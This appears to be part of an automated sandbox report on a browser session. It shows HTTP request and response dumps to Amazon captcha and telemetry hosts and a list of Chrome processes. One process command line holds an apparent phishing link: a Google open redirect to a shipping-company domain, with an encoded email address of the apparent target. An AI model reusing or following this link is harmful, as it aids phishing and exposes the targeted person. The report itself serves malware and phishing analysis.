                                                                                                                                  2025-01-27 14:46:02 UTC4035OUTData Raw: 7b 22 72 69 64 22 3a 22 5a 32 57 35 51 32 4e 4d 54 38 5a 46 54 48 52 35 33 36 50 58 22 2c 22 73 69 64 22 3a 22 38 33 37 2d 34 30 39 36 35 39 34 2d 38 37 31 37 31 37 32 22 2c 22 6d 69 64 22 3a 22 41 54 56 50 44 4b 49 4b 58 30 44 45 52 22 2c 22 73 6e 22 3a 22 6f 70 66 63 61 70 74 63 68 61 2e 61 6d 61 7a 6f 6e 2e 63 6f 6d 22 2c 22 72 65 71 73 22 3a 5b 7b 22 6f 70 66 63 73 6d 2d 69 22 3a 7b 22 77 22 3a 31 32 38 30 2c 22 68 22 3a 37 30 37 2c 22 74 22 3a 31 30 34 35 2c 22 6b 22 3a 22 64 6f 69 22 7d 7d 2c 7b 22 6f 70 66 63 73 6d 2d 69 22 3a 7b 22 74 22 3a 31 31 39 32 2c 22 73 22 3a 31 37 32 2c 22 6b 22 3a 22 73 6e 70 6d 22 2c 22 6e 22 3a 22 44 49 56 22 2c 22 69 64 22 3a 31 36 31 2c 22 61 74 74 72 22 3a 7b 22 73 74 79 6c 65 22 3a 22 70 6f 73 69 74 69 6f 6e 3a 20
                                                                                                                                  Data Ascii: {"rid":"Z2W5Q2NMT8ZFTHR536PX","sid":"837-4096594-8717172","mid":"ATVPDKIKX0DER","sn":"opfcaptcha.amazon.com","reqs":[{"opfcsm-i":{"w":1280,"h":707,"t":1045,"k":"doi"}},{"opfcsm-i":{"t":1192,"s":172,"k":"snpm","n":"DIV","id":161,"attr":{"style":"position:
                                                                                                                                  2025-01-27 14:46:02 UTC304INHTTP/1.1 204 No Content
                                                                                                                                  Date: Mon, 27 Jan 2025 14:46:02 GMT
                                                                                                                                  Content-Type: text/plain
                                                                                                                                  Connection: close
                                                                                                                                  x-amzn-RequestId: 0595ce30-25f9-447d-ba70-be7df2be6cf3
                                                                                                                                  Access-Control-Allow-Origin: *
                                                                                                                                  Access-Control-Expose-Headers: x-amzn-RequestId,x-amzn-ErrorType,x-amzn-ErrorMessage,Date,smithy-protocol


                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                  66192.168.2.550064108.138.16.1954433424C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                  2025-01-27 14:46:02 UTC628OUTGET /captcha/uyvnnjxx/Captcha_lfxcionvuw.jpg HTTP/1.1
                                                                                                                                  Host: images-na.ssl-images-amazon.com
                                                                                                                                  Connection: keep-alive
                                                                                                                                  sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                  sec-ch-ua-mobile: ?0
                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                  sec-ch-ua-platform: "Windows"
                                                                                                                                  Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                                                                                  Sec-Fetch-Site: cross-site
                                                                                                                                  Sec-Fetch-Mode: no-cors
                                                                                                                                  Sec-Fetch-Dest: image
                                                                                                                                  Referer: https://www.amazon.com/
                                                                                                                                  Accept-Encoding: gzip, deflate, br
                                                                                                                                  Accept-Language: en-US,en;q=0.9
                                                                                                                                  2025-01-27 14:46:02 UTC902INHTTP/1.1 200 OK
                                                                                                                                  Content-Type: image/jpeg
                                                                                                                                  Content-Length: 5434
                                                                                                                                  Connection: close
                                                                                                                                  Server: Server
                                                                                                                                  X-Amz-Ir-Id: 0e3d059e-c2e6-4745-b955-275e895f38da
                                                                                                                                  Last-Modified: Wed, 08 Feb 2012 17:15:21 GMT
                                                                                                                                  Access-Control-Allow-Origin: *
                                                                                                                                  Edge-Cache-Tag: x-cache-343,/captcha/uyvnnjxx/Captcha_lfxcionvuw
                                                                                                                                  Surrogate-Key: x-cache-343 /captcha/uyvnnjxx/Captcha_lfxcionvuw
                                                                                                                                  X-Nginx-Cache-Status: HIT
                                                                                                                                  Accept-Ranges: bytes
                                                                                                                                  Date: Mon, 27 Jan 2025 14:46:02 GMT
                                                                                                                                  Vary: Accept-Encoding
                                                                                                                                  Via: 1.1 4a0b7683a1d33d6d186965e831f2de96.cloudfront.net (CloudFront)
                                                                                                                                  Alt-Svc: h3=":443"; ma=86400
                                                                                                                                  Age: 28156
                                                                                                                                  Accept-Ch: Sec-CH-UA-Form-Factors, Sec-CH-Viewport-Width, Sec-CH-Width, Sec-CH-Viewport-Height, Sec-CH-DPR, ECT
                                                                                                                                  Server-Timing: provider;desc="cf"
                                                                                                                                  Timing-Allow-Origin: https://www.amazon.com
                                                                                                                                  X-Cache: Hit from cloudfront
                                                                                                                                  X-Amz-Cf-Pop: FRA56-P7
                                                                                                                                  X-Amz-Cf-Id: GwqMJbPJG38iawUjawWIwYGvHy4JqPsm_lBrPJ1V6q_kBebyw0eG1g==
                                                                                                                                  2025-01-27 14:46:02 UTC5434INData Raw: ff d8 ff e0 00 10 4a 46 49 46 00 01 01 01 00 48 00 48 00 00 ff db 00 43 00 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 ff c0 00 0b 08 00 46 00 c8 01 01 11 00 ff c4 00 1f 00 01 00 01 04 03 01 01 01 00 00 00 00 00 00 00 00 00 0a 07 08 09 0b 03 05 06 04 02 01 ff c4 00 2c 10 00 01 04 02 02 01 04 02 02 02 02 03 00 00 00 00 04 02 03 05 06 01 07 00 08 09 0a 11 12 13 14 15 21 22 16 23 17 19 24 25 31 ff da 00 08 01 01 00 00 3f 00 9f c7 1c 73 83 05 0d 92 72 1e 08 63 25 a5 9c 10 a1 70 f3 79 25 23 e5 7f 5e 1f cb 1f 2f b7 0c e5 7f d3 0e e5 3f 0c af fa e1 5e ff 00 c7 39 f8 e7 8f ba 6c 2a 26 b8 8e 0e 5f 60 5c ab 14 98 a9 19
                                                                                                                                  Data Ascii: JFIFHHCF,!"#$%1?src%py%#^/?^9l*&_`\


                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                  67192.168.2.55006518.204.152.184433424C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                  2025-01-27 14:46:03 UTC623OUTGET /1/oc-csi/1/OP/requestId=84WJXV7DNH36VC70R49D&js=1 HTTP/1.1
                                                                                                                                  Host: fls-na.amazon.com
                                                                                                                                  Connection: keep-alive
                                                                                                                                  sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                  sec-ch-ua-mobile: ?0
                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                  sec-ch-ua-platform: "Windows"
                                                                                                                                  Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                                                                                  Sec-Fetch-Site: same-site
                                                                                                                                  Sec-Fetch-Mode: no-cors
                                                                                                                                  Sec-Fetch-Dest: image
                                                                                                                                  Referer: https://www.amazon.com/
                                                                                                                                  Accept-Encoding: gzip, deflate, br
                                                                                                                                  Accept-Language: en-US,en;q=0.9
                                                                                                                                  2025-01-27 14:46:03 UTC176INHTTP/1.1 200 OK
                                                                                                                                  Date: Mon, 27 Jan 2025 14:46:03 GMT
                                                                                                                                  Content-Type: image/gif
                                                                                                                                  Content-Length: 43
                                                                                                                                  Connection: close
                                                                                                                                  x-amzn-RequestId: 13ff2758-2581-4cee-b32f-3888a5c72040
                                                                                                                                  2025-01-27 14:46:03 UTC43INData Raw: 47 49 46 38 39 61 01 00 01 00 80 00 00 00 00 00 ff ff ff 21 f9 04 00 00 00 00 00 2c 00 00 00 00 01 00 01 00 00 02 02 4c 01 00 3b
                                                                                                                                  Data Ascii: GIF89a!,L;


                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                  68192.168.2.55006618.66.143.1284433424C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                  2025-01-27 14:46:03 UTC394OUTGET /captcha/uyvnnjxx/Captcha_lfxcionvuw.jpg HTTP/1.1
                                                                                                                                  Host: images-na.ssl-images-amazon.com
                                                                                                                                  Connection: keep-alive
                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                  Accept: */*
                                                                                                                                  Sec-Fetch-Site: none
                                                                                                                                  Sec-Fetch-Mode: cors
                                                                                                                                  Sec-Fetch-Dest: empty
                                                                                                                                  Accept-Encoding: gzip, deflate, br
                                                                                                                                  Accept-Language: en-US,en;q=0.9
                                                                                                                                  2025-01-27 14:46:03 UTC857INHTTP/1.1 200 OK
                                                                                                                                  Content-Type: image/jpeg
                                                                                                                                  Content-Length: 5434
                                                                                                                                  Connection: close
                                                                                                                                  Server: Server
                                                                                                                                  X-Amz-Ir-Id: 04f7369c-f12a-4c20-b8d1-0dd27591724f
                                                                                                                                  Last-Modified: Wed, 08 Feb 2012 17:15:21 GMT
                                                                                                                                  Access-Control-Allow-Origin: *
                                                                                                                                  Edge-Cache-Tag: x-cache-864,/captcha/uyvnnjxx/Captcha_lfxcionvuw
                                                                                                                                  Surrogate-Key: x-cache-864 /captcha/uyvnnjxx/Captcha_lfxcionvuw
                                                                                                                                  X-Nginx-Cache-Status: HIT
                                                                                                                                  Accept-Ranges: bytes
                                                                                                                                  Date: Mon, 27 Jan 2025 07:20:01 GMT
                                                                                                                                  Vary: Accept-Encoding
                                                                                                                                  Via: 1.1 da392114e7046bd9720a70f40c796f62.cloudfront.net (CloudFront)
                                                                                                                                  Alt-Svc: h3=":443"; ma=86400
                                                                                                                                  Age: 28157
                                                                                                                                  Accept-Ch: Sec-CH-UA-Form-Factors, Sec-CH-Viewport-Width, Sec-CH-Width, Sec-CH-Viewport-Height, Sec-CH-DPR, ECT
                                                                                                                                  Server-Timing: provider;desc="cf"
                                                                                                                                  X-Cache: Hit from cloudfront
                                                                                                                                  X-Amz-Cf-Pop: FRA60-P4
                                                                                                                                  X-Amz-Cf-Id: 3s7fRUCWAjcMOJQB-dk78iL1YFVz_HqU3SSaL3m1aoSErTe1tOehUA==
                                                                                                                                  2025-01-27 14:46:03 UTC5434INData Raw: ff d8 ff e0 00 10 4a 46 49 46 00 01 01 01 00 48 00 48 00 00 ff db 00 43 00 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 ff c0 00 0b 08 00 46 00 c8 01 01 11 00 ff c4 00 1f 00 01 00 01 04 03 01 01 01 00 00 00 00 00 00 00 00 00 0a 07 08 09 0b 03 05 06 04 02 01 ff c4 00 2c 10 00 01 04 02 02 01 04 02 02 02 02 03 00 00 00 00 04 02 03 05 06 01 07 00 08 09 0a 11 12 13 14 15 21 22 16 23 17 19 24 25 31 ff da 00 08 01 01 00 00 3f 00 9f c7 1c 73 83 05 0d 92 72 1e 08 63 25 a5 9c 10 a1 70 f3 79 25 23 e5 7f 5e 1f cb 1f 2f b7 0c e5 7f d3 0e e5 3f 0c af fa e1 5e ff 00 c7 39 f8 e7 8f ba 6c 2a 26 b8 8e 0e 5f 60 5c ab 14 98 a9 19
                                                                                                                                  Data Ascii: JFIFHHCF,!"#$%1?src%py%#^/?^9l*&_`\


                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                  69192.168.2.55006754.88.216.1254433424C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                  2025-01-27 14:46:03 UTC390OUTGET /1/oc-csi/1/OP/requestId=84WJXV7DNH36VC70R49D&js=1 HTTP/1.1
                                                                                                                                  Host: fls-na.amazon.com
                                                                                                                                  Connection: keep-alive
                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                  Accept: */*
                                                                                                                                  Sec-Fetch-Site: none
                                                                                                                                  Sec-Fetch-Mode: cors
                                                                                                                                  Sec-Fetch-Dest: empty
                                                                                                                                  Accept-Encoding: gzip, deflate, br
                                                                                                                                  Accept-Language: en-US,en;q=0.9
                                                                                                                                  2025-01-27 14:46:03 UTC176INHTTP/1.1 200 OK
                                                                                                                                  Date: Mon, 27 Jan 2025 14:46:03 GMT
                                                                                                                                  Content-Type: image/gif
                                                                                                                                  Content-Length: 43
                                                                                                                                  Connection: close
                                                                                                                                  x-amzn-RequestId: aee5696c-6631-46dc-9b9a-be2142f915df
                                                                                                                                  2025-01-27 14:46:03 UTC43INData Raw: 47 49 46 38 39 61 01 00 01 00 80 00 00 00 00 00 ff ff ff 21 f9 04 00 00 00 00 00 2c 00 00 00 00 01 00 01 00 00 02 02 4c 01 00 3b
                                                                                                                                  Data Ascii: GIF89a!,L;


                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                  70192.168.2.55006818.204.152.184433424C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                  2025-01-27 14:46:03 UTC622OUTPOST /1/batch/1/OE/ HTTP/1.1
                                                                                                                                  Host: fls-na.amazon.com
                                                                                                                                  Connection: keep-alive
                                                                                                                                  Content-Length: 22869
                                                                                                                                  sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                  sec-ch-ua-platform: "Windows"
                                                                                                                                  sec-ch-ua-mobile: ?0
                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                  Content-Type: text/plain;charset=UTF-8
                                                                                                                                  Accept: */*
                                                                                                                                  Origin: https://www.amazon.com
                                                                                                                                  Sec-Fetch-Site: same-site
                                                                                                                                  Sec-Fetch-Mode: no-cors
                                                                                                                                  Sec-Fetch-Dest: empty
                                                                                                                                  Referer: https://www.amazon.com/
                                                                                                                                  Accept-Encoding: gzip, deflate, br
                                                                                                                                  Accept-Language: en-US,en;q=0.9
                                                                                                                                  2025-01-27 14:46:03 UTC16384OUTData Raw: 7b 22 72 69 64 22 3a 22 38 34 57 4a 58 56 37 44 4e 48 33 36 56 43 37 30 52 34 39 44 22 2c 22 73 69 64 22 3a 22 38 33 37 2d 34 30 39 36 35 39 34 2d 38 37 31 37 31 37 32 22 2c 22 6d 69 64 22 3a 22 41 54 56 50 44 4b 49 4b 58 30 44 45 52 22 2c 22 73 6e 22 3a 22 6f 70 66 63 61 70 74 63 68 61 2e 61 6d 61 7a 6f 6e 2e 63 6f 6d 22 2c 22 72 65 71 73 22 3a 5b 7b 22 63 73 6d 63 6f 75 6e 74 22 3a 7b 22 63 6f 75 6e 74 65 72 22 3a 22 62 61 73 65 6c 69 6e 65 43 6f 75 6e 74 65 72 32 22 2c 22 76 61 6c 75 65 22 3a 31 2c 22 74 22 3a 31 33 7d 7d 2c 7b 22 6f 70 66 63 73 6d 2d 69 22 3a 7b 22 6b 22 3a 22 72 64 66 22 2c 22 76 22 3a 7b 22 61 65 6c 22 3a 31 2c 22 61 74 6f 62 22 3a 31 2c 22 63 6a 73 22 3a 30 2c 22 63 72 6d 22 3a 30 2c 22 64 63 6d 22 3a 31 2c 22 66 6c 73 22 3a 30 2c
                                                                                                                                  Data Ascii: {"rid":"84WJXV7DNH36VC70R49D","sid":"837-4096594-8717172","mid":"ATVPDKIKX0DER","sn":"opfcaptcha.amazon.com","reqs":[{"csmcount":{"counter":"baselineCounter2","value":1,"t":13}},{"opfcsm-i":{"k":"rdf","v":{"ael":1,"atob":1,"cjs":0,"crm":0,"dcm":1,"fls":0,
                                                                                                                                  2025-01-27 14:46:03 UTC6485OUTData Raw: 22 3a 33 36 2c 22 73 69 64 22 3a 31 31 36 2c 22 74 78 74 22 3a 22 5c 6e 5c 6e 20 20 20 20 20 20 20 20 22 7d 7d 2c 7b 22 6f 70 66 63 73 6d 2d 69 22 3a 7b 22 74 22 3a 31 34 34 2c 22 73 22 3a 31 31 39 2c 22 6b 22 3a 22 73 6e 70 6d 22 2c 22 6e 22 3a 22 23 74 65 78 74 22 2c 22 69 64 22 3a 31 31 39 2c 22 70 69 64 22 3a 35 2c 22 73 69 64 22 3a 33 36 2c 22 74 78 74 22 3a 22 5c 6e 5c 6e 20 20 20 20 22 7d 7d 2c 7b 22 6f 70 66 63 73 6d 2d 69 22 3a 7b 22 74 22 3a 31 34 34 2c 22 73 22 3a 31 32 30 2c 22 6b 22 3a 22 73 6e 70 6d 22 2c 22 6e 22 3a 22 23 74 65 78 74 22 2c 22 69 64 22 3a 31 32 30 2c 22 70 69 64 22 3a 31 2c 22 73 69 64 22 3a 35 2c 22 74 78 74 22 3a 22 5c 6e 5c 6e 22 7d 7d 2c 7b 22 6f 70 66 63 73 6d 2d 69 22 3a 7b 22 74 22 3a 31 34 34 2c 22 73 22 3a 31 32 31
                                                                                                                                  Data Ascii: ":36,"sid":116,"txt":"\n\n "}},{"opfcsm-i":{"t":144,"s":119,"k":"snpm","n":"#text","id":119,"pid":5,"sid":36,"txt":"\n\n "}},{"opfcsm-i":{"t":144,"s":120,"k":"snpm","n":"#text","id":120,"pid":1,"sid":5,"txt":"\n\n"}},{"opfcsm-i":{"t":144,"s":121
                                                                                                                                  2025-01-27 14:46:04 UTC304INHTTP/1.1 204 No Content
                                                                                                                                  Date: Mon, 27 Jan 2025 14:46:04 GMT
                                                                                                                                  Content-Type: text/plain
                                                                                                                                  Connection: close
                                                                                                                                  x-amzn-RequestId: c8754429-f07b-4c67-9f3a-f63e558e928f
                                                                                                                                  Access-Control-Allow-Origin: *
                                                                                                                                  Access-Control-Expose-Headers: x-amzn-RequestId,x-amzn-ErrorType,x-amzn-ErrorMessage,Date,smithy-protocol


                                                                                                                                  020406080s020406080100

                                                                                                                                  Click to jump to process

                                                                                                                                  020406080s0.0050100MB

                                                                                                                                  Click to jump to process

                                                                                                                                  Target ID:0
                                                                                                                                  Start time:09:44:40
                                                                                                                                  Start date:27/01/2025
                                                                                                                                  Path:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                  Wow64 process (32bit):false
                                                                                                                                  Commandline:"C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized "about:blank"
                                                                                                                                  Imagebase:0x7ff715980000
                                                                                                                                  File size:3'242'272 bytes
                                                                                                                                  MD5 hash:45DE480806D1B5D462A7DDE4DCEFC4E4
                                                                                                                                  Has elevated privileges:true
                                                                                                                                  Has administrator privileges:true
                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                  Reputation:low
                                                                                                                                  Has exited:false

                                                                                                                                  Target ID:2
                                                                                                                                  Start time:09:44:44
                                                                                                                                  Start date:27/01/2025
                                                                                                                                  Path:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                  Wow64 process (32bit):false
                                                                                                                                  Commandline:"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2296 --field-trial-handle=2248,i,13835440009713760261,2985736920505819972,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
                                                                                                                                  Imagebase:0x7ff715980000
                                                                                                                                  File size:3'242'272 bytes
                                                                                                                                  MD5 hash:45DE480806D1B5D462A7DDE4DCEFC4E4
                                                                                                                                  Has elevated privileges:true
                                                                                                                                  Has administrator privileges:true
                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                  Reputation:low
                                                                                                                                  Has exited:false

                                                                                                                                  Target ID:3
                                                                                                                                  Start time:09:44:51
                                                                                                                                  Start date:27/01/2025
                                                                                                                                  Path:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                  Wow64 process (32bit):false
                                                                                                                                  Commandline:"C:\Program Files\Google\Chrome\Application\chrome.exe" "https://www.google.pn/url?sa==a6bzuik1ma3dlpHqxRTACXaYHYI&rct=s7fFjO3jMe8ieQpeNofXnE7ZxaxKrm87scW4CKSzwd4Eiunz5jJ6j2AdElmCOMFCyq&sa=t&url=amp/s/deshshippinglines.com/demo/mode/IJulKkbhDRoCeYksSX62whnucNHhPavrd66HpTU/Z29ya2EuamltZW5lekBkZXZvbC5lcw=="
                                                                                                                                  Imagebase:0x7ff715980000
                                                                                                                                  File size:3'242'272 bytes
                                                                                                                                  MD5 hash:45DE480806D1B5D462A7DDE4DCEFC4E4
                                                                                                                                  Has elevated privileges:true
                                                                                                                                  Has administrator privileges:true
                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                  Reputation:low
                                                                                                                                  Has exited:true
                                                                                                                                  There is hidden Windows Behavior. Click on Show Windows Behavior to show it.
                                                                                                                                  There is hidden Windows Behavior. Click on Show Windows Behavior to show it.

                                                                                                                                  No disassembly